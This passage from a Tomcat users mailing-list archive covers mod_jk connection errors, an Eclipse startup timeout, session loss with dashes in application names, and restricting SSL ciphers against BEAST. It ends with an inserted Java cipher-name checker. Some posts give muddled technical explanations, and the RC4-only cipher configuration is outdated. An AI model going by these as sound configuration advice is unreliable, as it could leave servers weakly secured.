 (nodeXX) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=110)
 [][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c
 (1035): (nodeXX) cping/cpong after connecting to the backend server failed
 (errno=110)
 [][X] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeXX) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=110)
 [][X] [error] ajp_service::jk_ajp_common.c (2626): (nodeXX)
 connecting to tomcat failed.
 
 
 [][X] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeYY) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=115)
 
 [][X] ] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeYY) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=115)
 [][X]  [error] ajp_service::jk_ajp_common.c (2626):
 (nodeYY) connecting to tomcat failed.
 
 
 What could be the explanations except for Tomcat Thread pool not having
 threads available anymore ? Thing we checked.
 
 Was there fixes in new mod_jk versions (1.2.37) regarding issues like these
 ?
 
 
 Thanks for your help
  

RE: Problem

2013-01-21 Thread Martin Gainty

eclipse is an enormous resource hog..Ive seen eclipse crash when someone opens 
vi after eclipse is running

so the problem is not tomcat but your Tomcat (sysdeo? plugin)

which version Tomcat(sysdeo?) plugin are you running?

Martin __ 
  From: vinit1...@live.in
 To: users@tomcat.apache.org
 Subject: RE: Problem
 Date: Mon, 21 Jan 2013 10:50:36 +0530
 
 I have run the TC in standlone mode...and it is running ..
 but when running thru eclipse juno ...it is showing the message -
 Server Tomcat v7.0 Server at localhost was unable to start within 45 seconds. 
 If the server requires more time, try increasing the timeout in the server 
 editor.
 
 i have reinstalled the plugin and increase the start timeout...its makes no 
 change. thanks
 
  From: mgai...@hotmail.com
  To: users@tomcat.apache.org
  Subject: RE: Problem
  Date: Sat, 19 Jan 2013 08:40:09 -0500
  
  
  what does the TC log say..
  
  have you run TC standalone $CATALINA_HOME\bin\catalina start
  
  if TC runs standalone but not thru eclipse then you have 2 possible 
  problems:
  
  1)possible Mis-configured TC eclipse plugin
  2)There is a problem with TC eclipse plugin itself..probably
2a)possible version mismatch between TC plugin and child dependencies
  
   2b)possible resource allocation issue..socket bound..not enough PermGen 
  space etc pingback with your findings
  
  Martin__ 
From: vinit1...@live.in
   To: users@tomcat.apache.org
   Subject: Problem
   Date: Sat, 19 Jan 2013 13:22:17 +0530
   
   Hi all,I am having a problem in starting the apache tomcat server version 
   7.0.31 through eclipse.It is showing the message that server taking time 
   to start the server,so increase the start time limit,after configuring 
   this  i am not able to rectify this problem.
   thanks  

 
  

RE: session not working when dash or underscore in application name

2013-01-20 Thread Martin Gainty

There are a number of TC variables that are acquired from the FileSystem during 
webapp initialisation..
unfortunately when File systems assign folder name they vary widely in their 
treatment of 'special characters' in filenames
as a test ..install Tomcat to Tomcat off of root folder then place webapps off 
of Tomcat then install one webapp heads-or-tails

so in your mind your filesystem *should* look like
/Tomcat/webapps/heads-or-tails
But NTFS File System creates an 8 character filename that it assigns as 
directory folder so instead of heads-or-tails folder you'll get
/Tomcat/webapps/HEADS-~1
Not inserting spaces, dashes (or anything besides a-z,0-9,A-Z) into 
folder-name is always a safe deployment strategy
Good luck,
Martin Gainty 
__ 

  Date: Sun, 20 Jan 2013 10:51:10 +0100
 From: benintechnolog...@yahoo.fr
 To: users@tomcat.apache.org
 Subject: Re: session not working when dash or underscore in application name
 
 Thanks, maybe the problem has been solved in 7.0.34, I'll try that 
 version later
 in the meantime I simply removed all dashes and underscores, and 
 everything works fine
 
 On 19/01/2013 20:52, Christopher Schultz wrote:
 
  To whom it may concern,
 
  On 1/19/13 7:15 AM, Benin Technologies wrote:
  I just installed Tomcat 7.0.32 on Debian Linux 6 (Squeeze). Client
  is Mozilla Firefox 12.0, also on Debian Linux 6.
 
  To test session behavior, I did a simple JSP page that simulates a
  coin launch (heads or tales), and displays the total of heads and
  total of tails.
 
  If my war file is called headsOrTails.war, it works just fine :
  http://tomcat:8080/headsOrTails/
 
  but if there are dashes or underscores in the name, Tomcat creates
  a new session for each page request (so I can't get the totals)
  http://tomcat:8080/heads-or-tails/
  http://tomcat:8080/heads_or_tails/
 
  is this a normal behavior ?
  I do not experience the behavior you describe on 7.0.34.
 
  Neither dashes nor underscores anywhere in the path of the JSP seem to
  have that effect: a single session is created when I try it.
 
  Perhaps something else is affecting your environment?
 
  - -chris
 
 
 
 
 
  

RE: Problem

2013-01-19 Thread Martin Gainty

what does the TC log say..

have you run TC standalone $CATALINA_HOME\bin\catalina start

if TC runs standalone but not thru eclipse then you have 2 possible problems:

1)possible Mis-configured TC eclipse plugin
2)There is a problem with TC eclipse plugin itself..probably
  2a)possible version mismatch between TC plugin and child dependencies

 2b)possible resource allocation issue..socket bound..not enough PermGen space 
etc pingback with your findings

Martin__ 
  From: vinit1...@live.in
 To: users@tomcat.apache.org
 Subject: Problem
 Date: Sat, 19 Jan 2013 13:22:17 +0530
 
 Hi all,I am having a problem in starting the apache tomcat server version 
 7.0.31 through eclipse.It is showing the message that server taking time to 
 start the server,so increase the start time limit,after configuring this  i 
 am not able to rectify this problem.
 thanks  
  

RE: Restricting ciphers

2013-01-11 Thread Martin Gainty


   
 1. The ciphers parameter in Connector determines the enabled cipher suites
 in the SSLSocket. See SSLSocket.setEnabledCipherSuites(). That in turn
 restricts which actual cipher suite can be negotiated with the client,
 depending also on the client's cipher suites and how JSSE chooses among
 those that intersect.
MG> understood
 
 2. The private key itself doesn't have any 'supported ciphers'  so your
 question is already meaningless. However (a) it does have a *type*, which is
 generally RSA or else DH, and (b) it corresponds to a single X.509
 certificate which contains a public key in the same type or format.
MG> yes the public key would implement RSA or DH or Idea or some other *type*

 If the
 server requests a client certificate, it (i.e. JSSE, not Tomcat) sends an
 SSL CertificateRequest message, which contains a list of acceptable
 certificate types and a list of acceptable signers.
MG> thus the choice for cipher suites is now assigned
MG> reprising the publicKey signer algorithm to cipher suite
MG> With a RSA (public) key you can nominally use the RSA and DHE_RSA cipher 
suite. But if the server certificate has a Key Usage 
extension which does not include the keyEncipherment flag, then you are 
nominally limited to DHE_RSA.
MG> With a DSA (public) key you can use only a DHE_DSS cipher suite.
MG> With a Diffie-Hellman (public) key, you can use only one of DH_RSA or 
DH_DSS, depending on the issuing certificate authority key type.
 If the client certificate isn't one of those types or isn't signed by one 
 of those signers it isn't sent
MG> the choice is made!
 and if the Web resource being requested is defined
 as requiring SSL client authentication, Tomcat would then deny access.
MGlet's look at the guts of a public key to clarify what's going on
MGkeytool -list -v -keystore NotForOutsideUse.jks
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 1 entry
Alias name: Alias
Creation date: Apr 24, 2012
Entry type: PrivateKeyEntry
Certificate chain length: 1
Certificate[1]:
Owner: UID=99, EMAILADDRESS=paynom...@paynomind.com, CN=BigBank,
 OU=, O=BigBank.com
Issuer: UID=IssuingAuthority, CN=CanonicalName, OU=IT Security, O=CanonicalName 
Serial number: 
Valid from: Tue Apr 24 12:21:00 EDT 2012 until: Fri Apr 24 12:21:00 EDT 2015
Certificate fingerprints:
 MD5:  
 SHA1:
 Signature algorithm name: SHA1withRSA
 Version: 3
/snip
let's look at the log produced by TC when Public key =NotForOutsideUse.jks 
request is made in the JSSE Key Exchange

keyStore is : NotForOutsideUse.jks
keyStore type is : jks

init keymanager of type SunX509 found key for : {Omitted}
chain [0] = [
[
  Version: V3
  Subject: UID=99, CN=CanonicalName ID: 99, OU=, O=paynomind.com
  Signature Algorithm: SHA1withRSA
  Key:  Sun RSA public key, 2048 bits
  modulus: Omitted
  public exponent: 9
  Validity: [From: Fri Dec 10 11:29:21 EST 2010,
   To: Mon Dec 09 11:29:21 EST 2013]
  Issuer: UID=PayNoMind, CN=CanonicalName, OU=Dept1, O=PayNoMind
  SerialNumber: [   Omitted  ]

EXAMPLE CONCLUSION:
the JSSE Key exchange is implementing  SSLV3 Protocol AND  RSA Signing Algo 

from the eligible ciphers listed here 
http://www.openssl.org/docs/apps/ciphers.html could the server implement 
IDEA-CBC-SHA cipher (if listed in Tomcat Connector ciphers=IDEA-CBC-SHA   
...

My understanding is there can be NO handshake as there is a mismatch 
BETWEEN Signing Algo already in use (RSA)
with the Signing Algorithm identified by the cipher (IDEA) from the ciphers 
parameter

is this not the case?
 
 Connection between (1) and (2): zero. MGagreed
 
 EJP
 
 -Original Message-
 From: Martin Gainty [mailto:mgai...@hotmail.com] 
 Sent: Friday, 11 January 2013 2:35 PM
 To: Tomcat Users List
 Subject: RE: Restricting ciphers
 
 
 it's a simple question what does ciphers parameter in Connector have anything
 to do with the supported ciphers from the key itself the 2 are disconnected
 please don't waste my time and anyone else's with insults when you are unable
 to answer this simple question
 Martin Gainty
 ___
 When Free Speech and Discovery
 are replaced by Confusion and Obfuscation it's time to move
  Date: Thu, 10 Jan 2013 18:25:02 -0500
  From: ch...@christopherschultz.net
  To: users@tomcat.apache.org
  Subject: Re: Restricting ciphers
  
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
  
  Martin,
  
  Honestly, I'm not sure why I'm feeding the troll at this point. Maybe 
  I'm trying to atone for some horrible crime I can't remember.
  
  On 1/10/13 10:05 AM, Martin Gainty wrote:
   terminology :
  
  Nobody was arguing about terminology. Next time, just refer to 
  Wikipedia like everyone else.
  
   All you don't know is whether those certificate  private key are 
   RSA or DSA algorithms
  
  It doesn't matter: you can use RSA (like everyone does) or DSA and 
  that will only determine the type

RE: Restricting ciphers

2013-01-10 Thread Martin Gainty

 terminology :
the X509 standard defines certificates, and RSA and DSA are two of the public 
key algorithms that can be used in those certificates;
certificates are used to hold public keys, and never private keys.
PKCS#12 is a standard for a container which holds X509 client certificates 
and  private keys
So, if you're examining a PKCS#12 file (typically .p12 
extension or a .pfx extension), then you already know:
It contains at least one X509 client certificate and
corresponding private keys.
All you don't know is whether those certificate  private key are RSA or DSA 
algorithms

You can check this by extracting the certificate(s), and then examine them:

openssl pkcs12 -in mycert.p12 -clcerts -nokeys -out mycert.crt

openssl x509 -in mycert.crt -text

The text output of the openssl x509 command should include a Subject Public Key 
section, which will include fields that let 
you see if it's an RSA or DSA key (along with the key size). 
http://stackoverflow.com/questions/1722181/determine-certificate-type

PublicKey Generation:
to generate a public-key from PKCS12 privateKeyAndX509Cert use openssl

openssl pkcs12 -in myFile.p12 -out myPublicKey.pem -clcerts -nokeys
https://ca.cern.ch/ca/Help/?kbid=023010

KeyAlgorithms:
KeyAlgorithms are categorised to their cipher-groups symmetric ciphers, 
public-key ciphers, and one-way hashing
to list available ciphers within AES algorithm use openssl e.g.

openssl ciphers -v 'AES+HIGH'

cipherGroup is categorised by keysize within cipher-groups (usually a 4-digit 
number which is a power of 2 e.g. 1024 and 2048)
http://www.gnupg.org/gph/en/manual.html#AEN185
each permutation of cipherGroup-KeySize is further categorised according to 
implemented ModeOfOperation
http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation 

ECB, CBC and PCBC are the usual choices for the optional ModeOfOperation 
parameter

Determining the ALGO-CIPHER supported by your key
so we can see that public keys contain an algorithm-cipher combination but how 
to determine the algo-cipher supported by your key:

keytool -list -v -keystore fubar.pfx -storetype PKCS12

Here is output:
Certificate fingerprints:
 MD5:
 SHA1:
 Signature algorithm name: SHA1withRSA 

Providers (SUN, SunJCE, SunJSSE,SunRsaSign, IBMJSSE, bcprov-jdkNN-MMM)
Let's stick with SunJSSE as our provider
supported ciphers will be those ciphers which match SHA1 with RSA from this 
list:
http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html 
so what you are asking Tomcat Connector to do is

1)export contents of supplied keystoreFile key of keystoreType PKCS12

2)determine Signature algorithm name

3)aggregate cipherSuite by determining Signature specific supported ciphers 
from Signature algorithm name from 
http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html
4)reference ciphers attribute from Tomcat Connector

5)determine SignatureSpecificSupportedCiphers from 3) and implement ONLY those 
ciphers which match exactly 
to the ciphers listed in Tomcat Connector 5)

(i have not seen this currently implemented)
Martin 
__ 
do not alter or disrupt this transmission
  Date: Thu, 10 Jan 2013 11:44:49 +0400
 Subject: Re: Restricting ciphers
 From: knst.koli...@gmail.com
 To: users@tomcat.apache.org
 
 2013/1/10 Baron Fujimoto ba...@hawaii.edu:
  On Wed, Jan 09, 2013 at 01:08:01PM +0400, Konstantin Kolinko wrote:
 2013/1/9 Baron Fujimoto ba...@hawaii.edu:
  I'm attempting to mitigate BEAST (CVE-2011-3389) attacks on Tomcat 6.0.35.
  My understanding is that the attack applies only to CBC ciphers, and that
  RC4 ciphers are not vulnerable, so I am attempting to restrict the set of
  ciphers that Tomcat uses with the following config for a connector:
 
<Connector protocol="HTTP/1.1" SSLEnabled="true"
   address="0.0.0.0"
   port="8443"
   maxThreads="150" scheme="https" secure="true"
   keystoreFile="/path/to/keystore"
   keystoreType="pkcs12"
   ciphers="TLS_RSA_WITH_RC4_128_SHA,
TLS_RSA_WITH_RC4_128_MD5,
SSL_CK_RC4_128_WITH_MD5"
   clientAuth="false" sslProtocol="TLS" />
 (...)
 
 
 As can be seen from your usage of keystoreType attribute, you are
 using Java implementation of the Connector,  not openssl/APR one.
 
 You should look into Java documentation for their cipher names.
 
 See this thread from October 2009:
 http://markmail.org/message/zn4namfhypyxum23
 
  Ahh, that was it! It did not occur to me that OpenSSL and Java might
  name the ciphers differently.  If I restrict the ciphers to those
  from the (differently named) set used by Java, it works as expected.
  Mahalo!
 
ciphers=SSL_RSA_WITH_RC4_128_MD5,
 SSL_RSA_WITH_RC4_128_SHA,
 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA,
 TLS_ECDHE_RSA_WITH_RC4_128_SHA,
 TLS_ECDH_ECDSA_WITH_RC4_128_SHA,
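
Added example, not part of the original thread and not Tomcat's own code: a small Java check for the naming mismatch resolved above, which compares a connector's ciphers value against the suite names the running JVM's JSSE provider actually knows. The class name CheckConnectorCiphers and the status strings are made up for this illustration, and the result depends on the JDK it is run with.

```java
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;
import java.util.TreeSet;
import javax.net.ssl.SSLContext;

public class CheckConnectorCiphers {

    /** Classify each configured name against the suites known to this JVM's JSSE provider. */
    static Map<String, String> classify(String ciphersAttr,
                                        Set<String> supported,
                                        Set<String> enabled) {
        Map<String, String> result = new LinkedHashMap<>();
        for (String raw : ciphersAttr.split(",")) {
            String name = raw.trim();          // the attribute may be wrapped over several lines
            if (name.isEmpty()) {
                continue;                      // tolerate a trailing comma
            }
            if (enabled.contains(name)) {
                result.put(name, "known to JSSE, enabled by default");
            } else if (supported.contains(name)) {
                result.put(name, "known to JSSE, not enabled by default");
            } else {
                // Typical cause in the thread: an OpenSSL-style name given to the Java connector.
                result.put(name, "NOT a JSSE suite name on this JVM");
            }
        }
        return result;
    }

    public static void main(String[] args) throws Exception {
        // Default input: the ciphers value from the first connector quoted in the thread.
        String attr = args.length > 0 ? args[0]
                : "TLS_RSA_WITH_RC4_128_SHA, TLS_RSA_WITH_RC4_128_MD5, SSL_CK_RC4_128_WITH_MD5";

        SSLContext ctx = SSLContext.getDefault();
        Set<String> supported = new TreeSet<>(
                Arrays.asList(ctx.getSupportedSSLParameters().getCipherSuites()));
        Set<String> enabled = new TreeSet<>(
                Arrays.asList(ctx.getDefaultSSLParameters().getCipherSuites()));

        classify(attr, supported, enabled)
                .forEach((name, status) -> System.out.println(name + " -> " + status));
    }
}
```

Run it with the same JVM that runs Tomcat, passing the connector's ciphers value as the single argument; any name reported as not a JSSE suite name cannot be negotiated by the Java connector.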
 
